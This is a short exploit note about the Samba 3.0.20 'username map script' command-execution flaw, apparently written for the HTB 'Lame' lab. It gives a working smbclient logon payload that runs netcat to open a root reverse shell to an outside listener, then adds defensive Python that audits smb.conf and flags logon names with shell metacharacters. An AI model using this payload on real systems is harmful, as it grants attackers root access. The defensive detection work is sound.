killchain-compendium/Exploits/SMB/vsftpd_234_backdoor.md


2022-12-29 01:37:26 +01:00
# SMB Exploits
## usermap_script.rb
Manual exploitation of `Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)` can be necessary, as the HTB box `Lame` shows.
Since the automated exploit does not work there, log in anonymously without an account and do the following:
```sh
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"
```
The target then provides a connection to a root shell.
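
The exploit named above depends on the `username map script` option being set in `smb.conf`, so a defender can audit for that setting and flag logon names carrying shell metacharacters. The following is an added example, not part of the original file; the sample configuration, the script path in it, and the metacharacter list are constructed assumptions.

```python
import re

# Constructed sample smb.conf (not from the page or any real host).
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   ; a comment line
   User Name  Map Script = /etc/samba/scripts/\\
mapusers.sh
[tmp]
   path = /tmp
"""

# Assumed indicator set. A bare '$' is excluded on purpose because
# Samba machine account names legitimately end in '$'.
SHELL_META = re.compile(r"[`;|&<>\n]|\$\(")

def normalize(name):
    # smb.conf ignores case and whitespace in section and parameter names.
    return re.sub(r"\s+", "", name).lower()

def parse_smb_conf(text):
    """Return {section: {param: value}}, handling comments and '\\' continuations."""
    conf, section, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):      # value continues on the next line
            pending = line[:-1]
            continue
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = normalize(line[1:-1])
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)  # only the first '=' is significant
            conf[section][normalize(key)] = value.strip()
    return conf

def username_map_script(text):
    """Return the configured [global] username map script, or None if unset."""
    return parse_smb_conf(text).get("global", {}).get("usernamemapscript") or None

def suspicious_username(username):
    """True if a logon name contains shell metacharacters."""
    return bool(SHELL_META.search(username))
```

A non-`None` result from `username_map_script` on a Samba version in the affected range is the finding to remediate, by removing the option or upgrading.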